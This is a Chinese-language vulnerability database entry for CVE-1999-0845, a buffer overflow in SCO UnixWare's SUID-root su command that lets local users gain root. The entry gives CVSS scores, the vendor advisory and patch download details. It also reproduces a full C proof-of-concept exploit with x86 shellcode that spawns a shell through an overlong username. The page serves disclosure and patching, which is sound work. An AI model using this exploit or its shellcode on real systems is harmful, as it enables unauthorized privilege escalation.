CVE-1999-0845
CVSS7.2
发布时间 :1999-11-25 00:00:00
修订时间 :2008-09-09 08:36:02
NMCOES    

[原文]Buffer overflow in SCO su program allows local users to gain root access via a long username.


[CNNVD]SCO UnixWare su(1)缓冲区溢出漏洞(CNNVD-199911-075)

        SCO su指令存在缓冲区溢出漏洞。本地用户可以使用长用户名获得根权限。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0845
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0845
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199911-075
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

SCO UnixWare su(1)缓冲区溢出漏洞
高危 缓冲区溢出
1999-11-25 00:00:00 2005-10-20 00:00:00
本地  
        SCO su指令存在缓冲区溢出漏洞。本地用户可以使用长用户名获得根权限。

- 公告与补丁

        SCO is providing an interim patch to address this issue in the form of a System Security Enhancement (SSE) package.
        SSE039 contains replacement binaries for each system type, and is available for Internet download via anonymous ftp, and from the SCOFORUM on Compuserve.
        You can download the SSE package as follows:
        Anonymous ftp (World Wide Web URL):
        ftp://ftp.sco.COM/SSE/sse039.ltr (cover letter, ASCII text)
         ftp://ftp.sco.COM/SSE/sse039.tar.Z (new binaries, compressed tar
        file)
        Compuserve:
        GO SCOFORUM, and search Library 11 (SLS/SSE Files) for these
        filenames:
        SSE039.LTR (cover letter, ASCII text)
         SSE039.TAZ (new binaries, compressed tar file)
        Checksums (sum -r):
        01787 3 sse039.ltr
         53627 555 sse039.tar.Z

- 漏洞信息 (19643)

SCO Unixware 2.1/7.0/7.0.1/7.1/7.1.1 su(1) Buffer Overflow Vulnerability (EDBID:19643)
sco local
1999-10-30 Verified
0 k2
N/A [点击下载]
source: http://www.securityfocus.com/bid/826/info

Certain versions of Unixware ship with a version of su(1) which is vulnerable to a buffer overflow attack. This attack is possible because su(1) fails to sanity check user supplied data, in this instance a username supplied on the command line. Because su(1) is SUID root this attack may result in root privileges. 

// UnixWare7 /usr/bin/su local, K2, revisited Oct-30-1999
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shell[] =
 "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
 "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
 "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
 "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
 "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
 "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";

const char x86_nop=0x90;
long nop,esp;
long offset=DEFOFF;
char buffer[SIZE];

long get_esp() { __asm__("movl %esp,%eax"); }

int main (int argc, char *argv[])
{
    register int i;

    if (argc > 1) offset += strtol(argv[1], NULL, 0);
    if (argc > 2) nop += strtoul(argv[2], NULL, 0);
    else
        nop = NOPDEF;
    esp = get_esp();

    memset(buffer, x86_nop, SIZE);
    memcpy(buffer+nop, shell, strlen(shell));

    for (i = nop+strlen(shell); i < SIZE-4; i += 4)
        *((int *) &buffer[i]) = esp+offset;

    printf("offset = [0x%x]\n",esp+offset);
    execl("/usr/bin/su", "su", buffer, NULL);

    printf("exec failed!\n");
    return 0;
}
		

- 漏洞信息

8789
SCO UNIX /bin/su Username Variable Local Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

- 时间线

1999-11-25 Unknow
1999-11-25 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

SCO UnixWare su(1) Buffer Overflow Vulnerability
Boundary Condition Error 826
No Yes
1999-11-25 12:00:00 2009-07-11 12:56:00
The exploit posted to the Bugtraq mailing list for this vulnerability lists K2 (ktwo@ktwo.ca) as the author and discoverer of this bug. It was posted to the Bugtraq mailing list on Nov 25 1999 .

- 受影响的程序版本

SCO Unixware 7.1.1
SCO Unixware 7.1
SCO Unixware 7.0.1
SCO Unixware 7.0
SCO Unixware 2.1

- 漏洞讨论

Certain versions of Unixware ship with a version of su(1) which is vulnerable to a buffer overflow attack. This attack is possible because su(1) fails to sanity check user supplied data, in this instance a username supplied on the command line. Because su(1) is SUID root this attack may result in root privileges.

- 漏洞利用

exploit available

- 解决方案

SCO is providing an interim patch to address this issue in the form of a System Security Enhancement (SSE) package.

SSE039 contains replacement binaries for each system type, and is available for Internet download via anonymous ftp, and from the SCOFORUM on Compuserve.

You can download the SSE package as follows:

Anonymous ftp (World Wide Web URL):

ftp://ftp.sco.COM/SSE/sse039.ltr (cover letter, ASCII text)
ftp://ftp.sco.COM/SSE/sse039.tar.Z (new binaries, compressed tar
file)

Compuserve:

GO SCOFORUM, and search Library 11 (SLS/SSE Files) for these
filenames:

SSE039.LTR (cover letter, ASCII text)
SSE039.TAZ (new binaries, compressed tar file)

Checksums (sum -r):

01787 3 sse039.ltr
53627 555 sse039.tar.Z

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站